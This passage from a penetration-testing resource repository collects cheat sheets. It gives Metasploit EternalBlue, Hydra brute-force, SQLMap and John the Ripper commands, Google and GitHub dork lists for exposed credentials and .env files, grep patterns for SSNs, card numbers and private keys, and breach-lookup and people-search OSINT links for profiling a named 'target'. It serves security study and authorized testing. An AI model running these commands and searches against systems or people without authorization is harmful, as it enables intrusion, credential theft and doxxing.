4. Follow TCP stream: 136 | - Right-click on a packet and select "Follow" > "TCP Stream" 137 | 138 | ## Metasploit Framework 139 | Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. 140 | 141 | 142 | - Exploit known vulnerabilities. 143 | - Perform post-exploitation modules to gather information. 144 | - Use Metasploit for penetration testing. 145 | 146 | **Commands:** 147 | 1. Install Metasploit Framework: 148 | ```sh 149 | sudo apt install -y metasploit-framework 150 | ``` 151 | 152 | 2. Exploit a vulnerability using Metasploit: 153 | ```sh 154 | msfconsole 155 | use exploit/windows/smb/ms17_010_eternalblue 156 | set RHOST 192.168.1.10 157 | run 158 | ``` 159 | 160 | 3. Perform a post-exploitation module: 161 | ```sh 162 | use post/windows/gather/enum_shares 163 | set SESSION 1 164 | run 165 | ``` 166 | 167 | ## Hydra 168 | Hydra is a parallelized login cracker which supports numerous protocols to attack. 169 | 170 | 171 | - Perform brute-force attacks on various services. 172 | - Test the strength of authentication mechanisms. 173 | 174 | **Commands:** 175 | 1. Install Hydra: 176 | ```sh 177 | sudo apt install -y hydra 178 | ``` 179 | 180 | 2. Brute-force SSH login: 181 | ```sh 182 | hydra -l admin -P /path/to/passwords.txt 192.168.1.10 ssh 183 | ``` 184 | 185 | 3. Brute-force FTP login: 186 | ```sh 187 | hydra -l admin -P /path/to/passwords.txt ftp://192.168.1.10 188 | ``` 189 | 190 | ## John the Ripper 191 | John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. 192 | 193 | 194 | - Crack password hashes using wordlists. 195 | - Perform brute-force attacks on password hashes. 196 | 197 | **Commands:** 198 | 1. Install John the Ripper: 199 | ```sh 200 | sudo apt install -y john 201 | ``` 202 | 203 | 2. Crack a password hash using a wordlist: 204 | ```sh 205 | john --wordlist=/usr/share/wordlists/rockyou.txt /path/to/hash.txt 206 | ``` 207 | 208 | 3. Perform a brute force attack: 209 | ```sh 210 | john --incremental /path/to/hash.txt 211 | ``` 212 | 213 | ## SQLMap 214 | SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. 215 | 216 | 217 | - Perform SQL injection to extract database information. 218 | - Automate database takeover. 219 | 220 | **Commands:** 221 | 1. Install SQLMap: 222 | ```sh 223 | sudo apt install -y sqlmap 224 | ``` 225 | 226 | 2. Perform SQL injection on a vulnerable URL: 227 | ```sh 228 | sqlmap -u "http://example.com/vuln?id=1" --dbs 229 | ``` 230 | 231 | 3. Extract database information: 232 | ```sh 233 | sqlmap -u "http://example.com/vuln?id=1" -D database_name --tables 234 | ``` 235 | 236 | ## Nikto 237 | Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. 238 | 239 | 240 | - Scan web servers for vulnerabilities. 241 | - Identify outdated server versions and configurations. 242 | 243 | **Commands:** 244 | 1. Install Nikto: 245 | ```sh 246 | sudo apt install -y nikto 247 | ``` 248 | 249 | 2. Scan a web server for vulnerabilities: 250 | ```sh 251 | nikto -h http://example.com 252 | ``` 253 | 254 | ## Kismet 255 | Kismet is a wireless network and device detector, sniffer, wardriving tool, and WIDS (wireless intrusion detection) framework. 256 | 257 | 258 | - Discover wireless networks and devices. 259 | - Log GPS coordinates for networks. 260 | 261 | **Commands:** 262 | 1. Install Kismet: 263 | ```sh 264 | sudo apt install -y kismet 265 | ``` 266 | 267 | 2. Configure Kismet to use GPSD: 268 | ```sh 269 | sudo nano /etc/kismet/kismet.conf 270 | ``` 271 | Ensure the following lines are set: 272 | ```sh 273 | gps=true 274 | gpstype=gpsd 275 | gpshost=localhost:2947 276 | ``` 277 | 278 | 3. Start Kismet with GPS: 279 | ```sh 280 | sudo kismet -c wlan0 --use-gpsd-gps 281 | ``` 282 | 283 | -------------------------------------------------------------------------------- /hardware/Upgrades-Mods/ppkb_kali_nethunter_pinephone_install.md: -------------------------------------------------------------------------------- 1 | ## Pinephone Keyboard 2 | _A guide to installing the ppkb userspace driver on the Kali Nethunter distro_ 3 | 4 | ### 1. Install Dependencies 5 | 6 | `sudo apt update && sudo apt upgrade` 7 | 8 | `sudo apt install build-essential linux-headers-$(uname -r) git` 9 | 10 | `sudo apt install sdcc nano php` 11 | 12 | ### 2. Install Userspace Driver 13 | 14 | `git clone https://xff.cz/git/pinephone-keyboard/` 15 | 16 | `cd pinephone-keyboard` 17 | 18 | `make` 19 | 20 | ### Persist the changes 21 | 22 | 1. Create a service for the driver: 23 | > [!Note] 24 | > Ensure to change the path to where you compiled the driver in the `ExecStart` path 25 | 26 | `sudo nano /etc/systemd/system/ppkb-i2c-inputd.service` 27 | 28 | ``` 29 | [Unit] 30 | Description=PinePhone Keyboard Service Daemon 31 | After=multi-user.target 32 | 33 | [Service] 34 | Type=simple 35 | ExecStart=/home/kali/pinephone-keyboard/build/ppkb-i2c-inputd 36 | Restart=on-failure 37 | 38 | [Install] 39 | WantedBy=multi-user.target 40 | ``` 41 | 42 | 2. Blacklist kernel driver 43 | 44 | `echo 'blacklist kb151' | sudo tee /etc/modprobe.d/blacklist.conf` 45 | 46 | 3. Update ram filesystem with these changes 47 | 48 | `sudo update-initramfs -u` 49 | 50 | 4. Enable the service we created 51 | 52 | `sudo systemctl enable ppkb-i2c-inputd.service` 53 | 54 | 5. Define the keboard model **(don't skip this step)** 55 | 56 | `echo 'export XKB_DEFAULT_MODEL=ppkb' | sudo tee -a ~/.profile` 57 | 58 | 6. Reboot 59 | 60 | `sudo reboot now` 61 | 62 | 3. ## Set Modifier Key 63 | 64 | 1. On Pinephone, open Settings 65 | 2. Select Keyboard > Alternate Characters Key 66 | 3. Select Left Super (Pinecone Key, example) 67 | 4. Hold the defined key and use the top row symbols 68 | 69 | You're Done! 70 | 71 | -------------------------------------------------------------------------------- /repos/BurpPlugins.md: -------------------------------------------------------------------------------- 1 | ## Burp Extensions & Tips 2 | 3 | ### Extensions 4 | 5 | - **[JS Link Finder](https://github.com/portswigger/js-link-finder)** by [InitRoot](https://twitter.com/initroott) 6 | - **[Upload Scanner](https://github.com/portswigger/upload-scanner)** by [Tobias ‘floyd’ Ospelt](https://twitter.com/floyd_ch) 7 | - **[Auth Analyzer](https://github.com/portswigger/auth-analyzer)** by [Simon Reinhart](https://github.com/simioni87) 8 | - **[Turbo Intruder](https://github.com/portswigger/turbo-intruder)** by [James Kettle](https://twitter.com/albinowax) 9 | - **[HTTP Request Smuggler](https://github.com/portswigger/http-request-smuggler)** by [James Kettle](https://twitter.com/albinowax) 10 | - [AWS Security Checks](https://portswigger.net/bappstore/f078b9254eab40dc8c562177de3d3b2d) 11 | 12 | - [xnl-h4ck3r/auto-repeater](https://github.com/xnl-h4ck3r/auto-repeater) 13 | 14 | - [/xnl-h4ck3r/GAP](https://github.com/xnl-h4ck3r/GAP-Burp-Extension) 15 | 16 | - [graphquail](https://github.com/forcesunseen/graphquail) 17 | 18 | - [BurpSuiteSharpener](https://github.com/mdsecresearch/BurpSuiteSharpener) 19 | 20 | - [DNS-Analyzer](https://github.com/The-Login/DNS-Analyzer) 21 | 22 | - [PyCript](https://github.com/Anof-cyber/PyCript) 23 | 24 | - [ParaForge](https://github.com/Anof-cyber/ParaForge) 25 | 26 | - [SSRFmap](https://github.com/swisskyrepo/SSRFmap) 27 | 28 | - [burp-vps-proxy](https://github.com/d3mondev/burp-vps-proxy) 29 | 30 | - [JSpector](https://github.com/hisxo/JSpector) 31 | 32 | - [ReconAIzer](https://github.com/hisxo/ReconAIzer) 33 | 34 | - [Container proxy for 🦊 Firefox](https://addons.mozilla.org/en-US/firefox/addon/container-proxy/) 35 | 36 | - [BurpBounty](https://github.com/wagiro/BurpBounty/tree/master/profiles/) 37 | 38 | ## Tips 39 | 40 | *[6 Burp Suite Tips & Tricks]*(https://taksec.medium.com/6-burp-suite-tips-tricks-60592cf843ba) 41 | 42 | *[Reflected XSS into HTML context with nothing encoded]*(https://systemweakness.com/reflected-xss-into-html-context-with-nothing-encoded-4789a7e973ba?source=rss----f20a9840e177---4) 43 | -------------------------------------------------------------------------------- /resources/Command-Line/grep.md: -------------------------------------------------------------------------------- 1 | # `grep Cheatsheet` 2 | 3 | Use with [grep clipboard commands](https://github.com/Root-Down-Digital/pentesting-resources/blob/main/resources/Command-Line/pbCopy-Paste.md) 4 | 5 | ## Basic Usage 6 | 7 | | Description | Command | 8 | |--------------------------------------------------|---------------------------------------| 9 | | Search for a Specific Pattern in a File | `grep pattern file.txt` | 10 | | Search for a Specific Pattern in Multiple Files | `grep pattern file1.txt file2.txt` | 11 | | Case-Insensitive Search | `grep -i pattern file.txt` | 12 | | Display Line Numbers with Matches | `grep -n pattern file.txt` | 13 | | Search for a Pattern Recursively in Directories | `grep -r pattern /path/to/directory` | 14 | 15 | ## Output Control 16 | 17 | | Description | Command | 18 | |--------------------------------------------------|---------------------------------------| 19 | | Display Only Matching Parts of Lines | `grep -o pattern file.txt` | 20 | | Count the Number of Matching Lines | `grep -c pattern file.txt` | 21 | | Invert Match to Display Non-Matching Lines | `grep -v pattern file.txt` | 22 | | Display File Names with Matches | `grep -l pattern /path/to/directory/*`| 23 | | Display File Names without Matches | `grep -L pattern /path/to/directory/*`| 24 | 25 | ## Advanced Search 26 | 27 | | Description | Command | 28 | |--------------------------------------------------|---------------------------------------| 29 | | Search for a Regular Expression | `grep -E regex file.txt` | 30 | | Search for Fixed Strings (No Regular Expressions)| `grep -F fixed string file.txt` | 31 | | Highlight Matches in the Output | `grep --color=auto pattern file.txt` | 32 | | Display the Count of Matches in Each File | `grep -c pattern /path/to/directory/*`| 33 | 34 | ## Context Matching 35 | 36 | | Description | Command | 37 | |--------------------------------------------------|---------------------------------------| 38 | | Display Lines Matching a Pattern and Their Context | `grep -C 3 pattern file.txt`
# 3 lines of context | 39 | | Display Lines Matching a Pattern and Preceding Context | `grep -B 3 pattern file.txt`
# 3 lines before match | 40 | | Display Lines Matching a Pattern and Following Context | `grep -A 3 pattern file.txt`
# 3 lines after match | 41 | 42 | ## Additional Commands for Red & Blue Teams 43 | 44 | | Description | Command | 45 | |--------------------------------------------------|-------------------------------------------------------------| 46 | | Search for IP Addresses | `grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' file.txt` | 47 | | Search for URLs | `grep -Eo 'http[s]?://[^ ]+' file.txt` | 48 | | Extract Email Addresses | `grep -Eo '\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b' file.txt` | 49 | | Search for HTTP Status Codes | `grep -Eo 'HTTP/[0-9\.]+\s+[0-9]{3}' file.txt` | 50 | | Find Base64 Encoded Strings | `grep -Eo '([A-Za-z0-9+/]{4}){2,}' file.txt` | 51 | | Search for Credit Card Numbers | `grep -Eo '\b[0-9]{13,16}\b' file.txt` | 52 | | Detect SQL Injection Attempts | `grep -Ei 'union.*select\|select.*from\|drop\s+table' file.txt` | 53 | | Search for JavaScript Functions | `grep -Eo 'function\s+[a-zA-Z0-9_]+\s*\(' file.txt` | 54 | | Extract Social Security Numbers | `grep -Eo '\b[0-9]{3}-[0-9]{2}-[0-9]{4}\b' file.txt` | 55 | | Find Passwords in Files | `grep -Eo 'password\s*[:=]\s*\S+' file.txt` | 56 | | Identify Private Keys | `grep -Eo '-----BEGIN (RSA\|DSA\|EC) PRIVATE KEY-----.*-----END (RSA\|DSA\|EC) PRIVATE KEY-----' file.txt` | 57 | | Extract Phone Numbers | `grep -Eo '\b[0-9]{3}-[0-9]{3}-[0-9]{4}\b' file.txt` | 58 | | Detect Shell Commands | `grep -Eo '(\bsh\b\|\bbash\b\|\bpython\b\|\bperl\b\|\bphp\b)' file.txt` | 59 | | Search for Hidden Directories | `grep -Eo '\/\.[a-zA-Z0-9_-]+' file.txt` | 60 | | Find JavaScript Variables | `grep -Eo 'var\s+[a-zA-Z0-9_]+\s*=' file.txt` | 61 | 62 | 63 | 64 | ## Miscellaneous 65 | 66 | | Description | Command | 67 | |--------------------------------------------------|----------------------------------------| 68 | | Suppress Errors about Non-Existent or Unreadable Files | `grep -s pattern file.txt` | 69 | | Use Extended Regular Expressions | `grep -E pattern file.txt` | 70 | | Show the Byte Offset of Matches | `grep -b pattern file.txt` | 71 | | Match the Whole Word | `grep -w word file.txt` | 72 | | Match the Whole Line | `grep -x whole line file.txt` | 73 | | Use a Pattern File | `grep -f patterns.txt file.txt` | 74 | | Exclude a Pattern | `grep -v exclude_pattern file.txt` | 75 | | Include Binary Files in the Search | `grep -a pattern binaryfile.bin` | 76 | | Search for Lines Starting with a Specific Pattern| `grep ^pattern file.txt` | 77 | | Search for Lines Ending with a Specific Pattern | `grep pattern$ file.txt` | 78 | | Display Only the Matching Filename | `grep -H pattern file.txt` | 79 | | Display the Total Number of Matches | `grep -o pattern file.txt \| wc -l` | 80 | | Display Lines Containing Multiple Patterns | `grep pattern1 file.txt \| grep pattern2` | 81 | | Display a List of Files and Their Line Count with Matches | `grep -c pattern *.txt` | 82 | | Display Lines Matching a Pattern Ignoring Binary Files | `grep --binary-files=text pattern file.txt` | 83 | | Include Line and Byte Offset in the Output | `grep -b -n pattern file.txt` | 84 | | Search Using Perl-Compatible Regular Expressions | `grep -P pattern file.txt` | 85 | | Display Only Non-Matching Lines | `grep -L pattern file.txt` | 86 | | Exclude Specific Files from Search | `grep --exclude=file.txt pattern /path/to/search` | 87 | | Exclude Multiple Files from Search | `grep --exclude={file1.txt,file2.txt} pattern /path/to/search` | 88 | | Exclude Specific Directories from Search | `grep --exclude-dir=dir pattern /path/to/search` | 89 | | Include Only Specific Files in Search | `grep --include=\*.{c,h} pattern /path/to/search` | 90 | -------------------------------------------------------------------------------- /resources/Command-Line/pbCopy-Paste.md: -------------------------------------------------------------------------------- 1 | ## `Grep` macOS Clipboard Cheatsheet 2 | 3 | ### Clipboard Commands 4 | 5 | | Description | Command | 6 | |--------------------------------------------------|----------------------------------------| 7 | | **Copy Text to Clipboard** | `echo "Sensitive Data" \| pbcopy` | 8 | | **Paste Text from Clipboard** | `pbpaste` | 9 | | **Copy File Contents to Clipboard** | `cat secrets.txt \| pbcopy` | 10 | | **Save Clipboard Contents to a File** | `pbpaste > extracted_secrets.txt` | 11 | | **Copy and Paste Between Files** | `cat source.txt \| pbcopy`
`pbpaste > destination.txt` | 12 | | **Append Clipboard Contents to a File** | `pbpaste >> logs.txt` | 13 | | **Script Example - Copy and Paste** | `echo "Security Alert: Unauthorized access detected!" \| pbcopy`
`echo "Clipboard contents:"`
`pbpaste` | 14 | | **Copy User Input to Clipboard** | `read -p "Enter command: " input`
`echo $input \| pbcopy`
`echo "Clipboard now contains:"`
`pbpaste` | 15 | 16 | ### Grep Commands for Clipboard Content 17 | 18 | | Description | Command | 19 | |--------------------------------------------------|-------------------------------------------------------------| 20 | | **Search for a Specific Word in Clipboard** | `pbpaste \| grep "password"` | 21 | | **Search for a Case-Insensitive Match** | `pbpaste \| grep -i "token"` | 22 | | **Display Line Numbers with Matches** | `pbpaste \| grep -n "error"` | 23 | | **Search for a Regular Expression** | `pbpaste \| grep -E "^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$"` | 24 | | **Invert Match to Display Non-Matching Lines** | `pbpaste \| grep -v "debug"` | 25 | | **Count the Number of Matching Lines** | `pbpaste \| grep -c "failed"` | 26 | | **Display Only Matching Parts of Lines** | `pbpaste \| grep -o "success"` | 27 | | **Search for Lines Starting with a Pattern** | `pbpaste \| grep "^START"` | 28 | | **Search for Lines Ending with a Pattern** | `pbpaste \| grep "END$"` | 29 | | **Highlight Matches in the Output** | `pbpaste \| grep --color=auto "keyword"` | 30 | -------------------------------------------------------------------------------- /resources/OSINT/Dehashed-Cheatsheet.md: -------------------------------------------------------------------------------- 1 | # Dehashed Cheatsheet 2 | 3 | >Note: You can mix and match as many operators as you want. Keep in mind you cannot use wildcards and/or regex operations in the same search. 4 | 5 | ## Basic Search 6 | 7 | | **Search Type** | **Query Example** | **Description** | 8 | |------------------------|---------------------------------------|----------------------------------------------------------------------| 9 | | Simple Query | `email@example.com` | Searches for occurrences of the exact email. | 10 | | Wildcard Search | `email@*` | Searches for emails from any domain starting with "email@". | 11 | | Multiple Terms | `term1 AND term2` | Searches for records containing both term1 and term2. | 12 | | Exclusion | `term1 -term2` | Searches for records containing term1 but not term2. | 13 | 14 | ## Field-Specific Searches 15 | 16 | | **Field** | **Query Example** | **Description** | 17 | |------------------------|---------------------------------------|----------------------------------------------------------------------| 18 | | Email | `email:email@example.com` | Searches specifically for the email field. | 19 | | Username | `username:username123` | Searches for occurrences of the specified username. | 20 | | Password | `password:password123` | Searches for records containing the specified password. | 21 | | Name | `name:"John Doe"` | Searches for the exact name. | 22 | | IP Address | `ip:192.168.1.1` | Searches for the specified IP address. | 23 | | Phone Number | `phone:1234567890` | Searches for the specified phone number. | 24 | | Address | `address:"123 Main St"` | Searches for a specific street address. | 25 | | Domain | `domain:example.com` | Searches for records associated with a domain. | 26 | 27 | ## Effective Search Tips 28 | 29 | **Combine Operators:** 30 | 31 | `email:example@example.com&username:test&domain:example.com` 32 | 33 | **Use Regex:** 34 | 35 | `email:/.*@example\.com/` 36 | 37 | **Filter Data Sources:** 38 | 39 | `email:example@example.com&source:"Breached Site"` 40 | 41 | **Date Range Filtering:** 42 | 43 | `date:[2021-01-01 TO 2022-01-01]` 44 | 45 | 46 | 47 | ## Advanced Search 48 | 49 | | **Technique** | **Query Example** | **Description** | 50 | |------------------------|---------------------------------------|----------------------------------------------------------------------| 51 | | Regular Expressions | `email:/.*@example\.com/` | Uses regex to search for emails from example.com domain. | 52 | | Date Range | `date:[2021-01-01 TO 2022-01-01]` | Searches for records within the specified date range. | 53 | | Data Sources | `source:"Breached Site"` | Searches within a specific breached site. | 54 | | Combining Queries | `email:email@example.com AND source:"Breached Site"` | Combines multiple query parameters. | 55 | 56 | ## Example Queries with Multiple Operators 57 | 58 | | **Example** | **Query** | 59 | |------------------------|----------------------------------------------------------------------------| 60 | | Basic Email Query | `email:example@example.com` | 61 | | Username Query | `username:example` | 62 | | Domain Query | `domain:example.com` | 63 | | Domain with Data | `domain:example.com&data=collections` | 64 | | Email and Username | `email:example@example.com&username:test` | 65 | | Email with Wildcard | `email:example@example.com&wildcard` | 66 | | Username with Wildcard | `username:test&data=collections&wildcard` | 67 | | Complex Search | `email:example@example.com&username:test&data=collections&wildcard` | 68 | | Regex Example | `username:example&email:example@example.com&name:/[A-Za-z]/&ip_address:127.0.0.1&data=collections®ex` | 69 | 70 | ## Command-Line Tool Integration 71 | 72 | ### Using `curl` 73 | ```bash 74 | curl -X GET "https://api.dehashed.com/search?query=email:email@example.com&username:test" \ 75 | -H "Accept: application/json" \ 76 | -H "Authorization: Basic " 77 | ``` 78 | Using Python 79 | ```python 80 | import requests 81 | from requests.auth import HTTPBasicAuth 82 | 83 | url = "https://api.dehashed.com/search?query=email:email@example.com&username:test" 84 | response = requests.get(url, auth=HTTPBasicAuth('YOUR_EMAIL', 'YOUR_API_KEY')) 85 | print(response.json()) 86 | ``` 87 | -------------------------------------------------------------------------------- /resources/OSINT/GuideLinks.md: -------------------------------------------------------------------------------- 1 | ## Introduction 2 | 3 | This document contains a comprehensive list of OSINT tools and resources. 4 | 5 | ### User Research 6 | 7 | - LeakCheck - [https://leakcheck.io/](https://leakcheck.io/) 8 | - SnusBase - [https://snusbase.com/](https://snusbase.com/) 9 | - [Scylla.sh](http://scylla.sh/) - [https://scylla.sh/](https://scylla.sh/) 10 | - HaveIBeenPwned - [https://haveibeenpwned.com/](https://haveibeenpwned.com/) 11 | 12 | ### Usernames 13 | 14 | - NameChk - [https://namechk.com/](https://namechk.com/) 15 | - WhatsMyName - [https://whatsmyname.app/](https://whatsmyname.app/) 16 | - NameCheckup - [https://namecheckup.com/](https://namecheckup.com/) 17 | 18 | ### People 19 | 20 | - WhitePages - [https://www.whitepages.com/](https://www.whitepages.com/) 21 | - TruePeopleSearch - [https://www.truepeoplesearch.com/](https://www.truepeoplesearch.com/) 22 | - FastPeopleSearch - [https://www.fastpeoplesearch.com/](https://www.fastpeoplesearch.com/) 23 | - FastBackgroundCheck - [https://www.fastbackgroundcheck.com/](https://www.fastbackgroundcheck.com/) 24 | - WebMii - [https://webmii.com/](https://webmii.com/) 25 | - PeekYou - [https://peekyou.com/](https://peekyou.com/) 26 | - 411 - [https://www.411.com/](https://www.411.com/) 27 | - Spokeo - [https://www.spokeo.com/](https://www.spokeo.com/) 28 | - That'sThem - [https://thatsthem.com/](https://thatsthem.com/) 29 | - Voter Records - [https://www.voterrecords.com](https://www.voterrecords.com/) 30 | 31 | ### Phonenumbers 32 | 33 | - TrueCaller - [https://www.truecaller.com/](https://www.truecaller.com/) 34 | - CallerID Test - [https://calleridtest.com/](https://calleridtest.com/) 35 | - Infobel - [https://infobel.com/](https://infobel.com/) 36 | 37 | ### Birthdays 38 | 39 | "Name of target" intext:"happy birthday" 40 | 41 | ### Resumes 42 | 43 | - Use CV or Resume 44 | 45 | "Name of targert" resume filetype:pdf 46 | 47 | ### Social Media 48 | 49 | - Twint - [https://github.com/twintproject/twint](https://github.com/twintproject/twint) 50 | 51 | ### Twitter 52 | 53 | - Twitter Advanced Search - [https://twitter.com/search-advanced](https://twitter.com/search-advanced) 54 | - Social Bearing - [https://socialbearing.com/](https://socialbearing.com/) 55 | - Twitonomy - [https://www.twitonomy.com/](https://www.twitonomy.com/) 56 | - Sleeping Time - [http://sleepingtime.org/](http://sleepingtime.org/) 57 | - Mentionmapp - [https://mentionmapp.com/](https://mentionmapp.com/) 58 | - Tweetbeaver - [https://tweetbeaver.com/](https://tweetbeaver.com/) 59 | - [Spoonbill.io](http://spoonbill.io/) - [http://spoonbill.io/](http://spoonbill.io/) 60 | - Tinfoleak - [https://tinfoleak.com/](https://tinfoleak.com/) 61 | - TweetDeck - [https://tweetdeck.com/](https://tweetdeck.com/) 62 | 63 | ### Facebook 64 | 65 | - Sowdust Github - [https://sowdust.github.io/fb-search/](https://sowdust.github.io/fb-search/) 66 | - IntelligenceX Facebook Search - [https://intelx.io/tools?tab=facebook](https://intelx.io/tools?tab=facebook) 67 | 68 | ### Instagram 69 | 70 | - Wopita - [https://wopita.com/](https://wopita.com/) 71 | - Code of a Ninja - [https://codeofaninja.com/tools/find-instagram-user-id/](https://codeofaninja.com/tools/find-instagram-user-id/) 72 | - InstaDP - [https://www.instadp.com/](https://www.instadp.com/) 73 | - ImgInn - [https://imginn.com/](https://imginn.com/) 74 | 75 | ### Snapchat Maps 76 | 77 | - [https://map.snapchat.com](https://map.snapchat.com/) 78 | -------------------------------------------------------------------------------- /resources/OSINT/dorks/GitDorks.md: -------------------------------------------------------------------------------- 1 | ## GitDorks 2 | 3 | Directory Busting 4 | ``` 5 | target intitle:index of config.php 6 | target inurl:/log intext:POST / OR intext:GET / filetype:log 7 | target intitle:index of inurl:wp-content/uploads 8 | target intitle:index of parent directory 9 | target inurl:/saml2 10 | target inurl:/php/.. -github 11 | target inurl:/swf/ intitle:flashvars -github 12 | target inurl:/AHS/ 13 | target inurl:/phpmyadmin/ filetype:sql 14 | target inurl:/wp-content/uploads/ filetype:php 15 | target inurl:/cgi-bin/ 16 | ``` 17 | 18 | Log-related 19 | ``` 20 | target inurl:/log intext:POST / OR intext:GET / filetype:log 21 | target ext:log php error OR mysql error 22 | target intext:Thank you for your purchase filetype:log 23 | target intext:login OR intext:username OR intext:password filetype:log 24 | ``` 25 | 26 | Authentication 27 | ``` 28 | target intext:Restricted Access OR intitle:Authentication Required 29 | target intitle:Windows SBS Internet Applications intext:remote desktop 30 | target intext:Novell WebAccess intext:User Name OR Password 31 | target intext:no robots intext:noindex intext:nofollow OR intext:no robots intext:noindex intext:none OR intext:no robots intext:noindex intext:noarchive OR intext:no robots intext:noindex intext:nosnippet 32 | target intitle:Remote Desktop Web Connection inurl:tsweb 33 | target intext:mail.domain.com OR intext:webmail.domain.com OR intext:owa.domain.com 34 | target inurl:/cgi-bin/pass.txt 35 | ``` 36 | 37 | Software 38 | ``` 39 | target intitle:phpMyAdmin inurl:db_structure.php 40 | target intitle:HFS / HTTP File Server 41 | target intitle:phpMyAdmin Welcome to phpMyAdmin 42 | target intitle:Apache Status intext:Apache Server Status for 43 | target intext:Lucky PHP Shell OR intitle:Lucky PHP Shell 44 | target intitle:Zend Server 7 45 | target intext:DHCP FORCER inurl:/remote.php 46 | target intext:Debut Video Capture Software OR intitle:Debut - Record and capture video -registration code 47 | target intitle:WebcamXP 5 Server Status 48 | target intitle:nagios filetype:cfg 49 | target intext:Grandstream Networks, Inc. All Rights Reserved 50 | target intext:License Key OR Product Key OR CD Key filetype:txt 51 | target intext:Powered by Simple Machines OR intitle:SMF 52 | site:example.com inurl:wp-content 53 | site:example.com inurl:wp-includes 54 | site:example.com intext:"WordPress" intext:"powered by" 55 | site:example.com intext:"Joomla" intext:"powered by" 56 | site:example.com intext:"Drupal" intext:"powered by" 57 | site:example.com intext:"Magento" intext:"powered by" 58 | ``` 59 | 60 | Sensitive pages/source 61 | ``` 62 | site:example.com inurl:.git intext:"index of" 63 | site:example.com allintext:index filetype:git 64 | site:example.com inurl:admin 65 | site:example.com inurl:wp-admin 66 | site:example.com intext:"password" 67 | site:example.com intext:"api_key" 68 | site:example.com intext:"username" intext:"password" 69 | site:example.com intext:"email" intext:"password" 70 | site:example.com inurl:vulnerabilities 71 | 72 | Other Keywords: 73 | app_id, auth_token, client_certificate, client_secret_key, encrypted_credentials, fingerprint_data, github_app_token, identity_provider_token, key_pair, login_token, oauth_token, private_access_token, secret_access_key, session_id, signing_key, ssh_certificate, token_id, user_certificate, webhook_token, password, api_key, access_key, dbpassword, dbuser, pwd, pwds, aws_access, key, token, credentials, pass, pwd, passwd, private, preprod, appsecret 74 | ``` 75 | 76 | Files 77 | ``` 78 | site:example.com filetype:xls 79 | site:example.com ext:pdf 80 | 81 | language: assembly, c, c#, c++, clojure, dart, elixir, erlang, go, haskell, java, javascript, kotlin, lua, perl, php, python, ruby, rust, swift, json, bash, shell 82 | 83 | ext: 84 | conf, css, csv, html, json, log, md, pdf, php, ps1, py, rb, sql, toml, txt, xml, yaml, yml, zip, bat, config, ini, env 85 | 86 | filename: 87 | .env, .env.local, .gitconfig, .htaccess, .npmrc, .prettierrc, .ssh/idrsa, docker-compose.yaml, package-lock.json, package.json, server.js, webpack.config.js, netrpc, .git-credentials, .history, .htpasswd, bashhistory` 88 | 89 | ``` 90 | -------------------------------------------------------------------------------- /resources/OSINT/dorks/GoogleDorks.md: -------------------------------------------------------------------------------- 1 | ## Top Google Dorks 2 | *🔍 Search and profit* 3 | 4 | #### Site: (Search specific site) 5 | ``` 6 | site:example.com intext:confidential 7 | site:example.com ext:log 8 | site:example.com inurl:admin 9 | site:example.com inurl:login 10 | site:example.com inurl:secure 11 | site:example.com filetype:sql 12 | site:example.com ext:xml 13 | site:example.com ext:csv 14 | site:example.com ext:json 15 | site:example.com ext:asp 16 | ``` 17 | #### Extension: (Search specific file extensions) 18 | ``` 19 | site:example.com ext:doc 20 | site:example.com ext:docx 21 | site:example.com ext:odt 22 | site:example.com ext:txt 23 | site:example.com ext:rtf 24 | site:example.com ext:pdf 25 | site:example.com ext:xls 26 | site:example.com ext:xlsx 27 | site:example.com ext:ini 28 | site:example.com ext:bak 29 | ``` 30 | #### Inurl: (Search URLs containing keywords) 31 | ``` 32 | site:example.com inurl:admin 33 | site:example.com inurl:login 34 | site:example.com inurl:secure 35 | site:example.com inurl:upload 36 | site:example.com inurl:download 37 | site:example.com inurl:profile 38 | site:example.com inurl:edit 39 | site:example.com inurl:password 40 | site:example.com inurl:register 41 | site:example.com inurl:account 42 | ``` 43 | #### Pastebin Leaks: (Search for leaks on Pastebin) 44 | ``` 45 | site:pastebin.com "username" 46 | site:pastebin.com "password" 47 | site:pastebin.com "email" 48 | site:pastebin.com "credentials" 49 | site:pastebin.com "leak" 50 | site:pastebin.com "database" 51 | site:pastebin.com "hack" 52 | site:pastebin.com "breach" 53 | site:pastebin.com "login" 54 | site:pastebin.com "dump" 55 | ``` 56 | #### Index of: (Search for directory listings) 57 | ``` 58 | site:example.com "index of" passwd 59 | site:example.com "index of" password 60 | site:example.com "index of" config 61 | site:example.com "index of" db 62 | site:example.com "index of" users 63 | site:example.com "index of" admin 64 | site:example.com "index of" backup 65 | site:example.com "index of" login 66 | site:example.com "index of" secure 67 | site:example.com "index of" secret 68 | ``` 69 | #### Filetypes: (Search for specific file types) 70 | ``` 71 | site:example.com filetype:sql 72 | site:example.com filetype:db 73 | site:example.com filetype:ini 74 | site:example.com filetype:txt 75 | site:example.com filetype:cfg 76 | site:example.com filetype:env 77 | site:example.com filetype:bak 78 | site:example.com filetype:log 79 | site:example.com filetype:dat 80 | site:example.com filetype:save 81 | ``` 82 | #### Cache: (Search Google cache) 83 | ``` 84 | cache:example.com login 85 | cache:example.com register 86 | cache:example.com upload 87 | cache:example.com download 88 | cache:example.com profile 89 | cache:example.com account 90 | cache:example.com password 91 | cache:example.com secure 92 | cache:example.com admin 93 | cache:example.com secret 94 | ``` 95 | #### Info: (Get info about a specific page) 96 | ``` 97 | info:example.com login 98 | info:example.com register 99 | info:example.com upload 100 | info:example.com download 101 | info:example.com profile 102 | info:example.com account 103 | info:example.com password 104 | info:example.com secure 105 | info:example.com admin 106 | info:example.com secret 107 | ``` 108 | #### Related: (Find related pages) 109 | ``` 110 | related:example.com login 111 | related:example.com register 112 | related:example.com upload 113 | related:example.com download 114 | related:example.com profile 115 | related:example.com account 116 | related:example.com password 117 | related:example.com secure 118 | related:example.com admin 119 | related:example.com secret 120 | ``` 121 | #### Allintext: (Search for occurrences of all keywords in text) 122 | 